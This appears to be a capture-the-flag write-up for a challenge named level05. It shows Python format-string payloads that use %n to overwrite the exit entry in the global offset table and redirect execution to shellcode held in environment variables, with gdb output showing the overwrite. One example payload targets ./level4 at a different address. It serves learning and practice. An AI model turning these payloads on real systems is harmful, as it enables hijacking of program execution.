# level05
#

This binary is vulnerable to a format string vulnerablity, we will use the %n specifier in order to write
to the exit entry in the global offset table.

We will overide it by the address of shellcode injected through enviroment variables.


example payload: (python -c "print('\x10\x98\x04\x08'+ '%16930112u%12\$n')"; cat) | ./level4

addr of exit in the global offset table is '0x80497e0'

new target addr 0xffffdeb7 -> shellcode addr

original value
|
 --> (gdb) x/i 0x80497e0
   0x80497e0 <exit@got.plt>:	jbe    0x8049765 <_DYNAMIC+105>

value after payload
|
 --> (gdb) x/i 0x80497e0
  0x80497e0 <exit@got.plt>:	jbe    0xffffdeb7

python -c "print('\xe0\x97\x04\x08' +'\xe2\x97\x04\x08'+ '%57007u%10\$n' + '%8520u%11\$n' )"